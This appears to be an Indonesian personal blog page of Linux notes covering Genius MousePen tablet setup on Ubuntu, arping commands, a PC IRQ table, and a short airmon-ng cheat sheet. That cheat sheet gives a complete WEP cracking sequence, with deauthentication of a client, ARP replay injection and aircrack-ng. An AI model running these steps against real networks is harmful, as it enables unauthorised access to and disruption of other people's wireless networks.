Tampilkan postingan dengan label LN-ux. Tampilkan semua postingan
Tampilkan postingan dengan label LN-ux. Tampilkan semua postingan

Jumat, 09 September 2011

Genius MousePen work with Ubuntu 10.10

overlord computer
$  sudo add-apt repository ppa:doctormo/xorg wizardpen && sudo apt-get update && sudo apt-get install xserver-xorg-input-wizardpen

$ sudo cp /usr/lib/X11/xorg.conf.d/70-wizardpen.conf /usr/share/X11/xorg.conf.d

Restart

$ sudo gedit /usr/lib/X11/xorg.conf.d/70-wizardpen.conf

Section "InputClass"
   Identifier "wizardpen"
   MatchIsTablet "on"
# Here I hardcoded the event4, please check wich event is yours.
   MatchDevicePath "/dev/input/event4"
#[CALIBRATION] This data was taken from wizard-calibrate tool.
    Option        "TopX"        "624"
    Option        "TopY"        "1725"
    Option        "BottomX"    "32702"
    Option        "BottomY"    "31992"
#[END CALIBRATION]
   Driver "wizardpen"
EndSection

Save & Exit

----------------------------------------------------------------------------------

How to know the event of your MousePen
$  cat /proc/bus/input/devices

I: Bus=0003 Vendor=5543 Product=0005 Version=0100
N: Name="UC-LOGIC Tablet WP8060U"
P: Phys=usb-0000:00:1a.2-2.2/input0
S: Sysfs=/devices/pci0000:00/0000:00:1a.2/usb5/5-2/5-2.2/5-2.2:1.0/input/input4
U: Uniq=
H: Handlers=mouse1 event4
B: EV=1f
B: KEY=c01 0 3f0001 0 0 0 0 0 0 0 0
B: REL=303
B: ABS=100000f
B: MSC=10

Pake judul apa? Terserah yang baca

-------------------------------------------------------------------
$ sudo arping -U {alamat IP} -I {Interface}
$ sudo arping -A -c {Number} -I {Interface}
$ sudo arping -U 172.16.80.3 -I eth1
$ sudo arping -c 4 -A -I eth0 172.16.80.3
-------------------------------------------------------------------
  1. -A : ARP reply
  2. -C 4: 4x kiriman
  3. -I eth0: memakai interface eth0
  4. 1.2.3.4: ganti dengan IP address yang ada.
-------------------------------------------------------------------

Catatan singkat Airmon-ng

=========================================
=  essid    = LVKAttack                 =
=  bsid     = 00:25:86:F2:78:8A         =
=  canal    = 1                         =
=  enc      = WEP                       =
=  client   = 00:10:60:A0:9F:4B         =
=========================================
=========================================
=  - ifconfig                           =
=  - airmon-ng start wlan0              =
=========================================
  1. airodump-ng mon0
  2. airodump-ng --bssid 00:25:86:F2:78:8A --channel 1 --write capture mon0
  3. aireplay-ng --deauth 10 -a 00:25:86:F2:78:8A -h 00:10:60:A0:9F:4B mon0
  4. aireplay-ng  --arpreplay -o 0 -b 00:25:86:F2:78:8A -h 00:10:60:A0:9F:4B mon0
  5. aircrack-ng capture-01.cap

interrupt request

Master PIC
IRQ 0 — system timer (cannot be changed);
IRQ 1 — keyboard controller (cannot be changed);
IRQ 2 — cascaded signals from IRQs 8–15; — any devices configured to use IRQ 2 will actually be using IRQ 9
IRQ 3 — serial port controller for COM2 (shared with COM4, if present);
IRQ 4 — serial port controller for COM1 (shared with COM3, if present);
IRQ 5 — LPT port 2 or sound card;
IRQ 6 — floppy disk controller;
IRQ 7 — LPT port 1 or sound card (8-bit Sound Blaster and compatibles).


Slave PIC
IRQ 8 — RTC Timer
IRQ 9 — open interrupt / available or SCSI host adapter; — any devices configured to use IRQ 2 will actually be using IRQ 9
IRQ 10 — open interrupt / available or SCSI or NIC;
IRQ 11 — open interrupt / available or SCSI or NIC;
IRQ 12 — mouse on PS/2 connector;
IRQ 13 — math co-processor or integrated floating point unit or inter-processor interrupt (use depends on OS);
IRQ 14 — primary ATA channel;
IRQ 15 — secondary ATA channel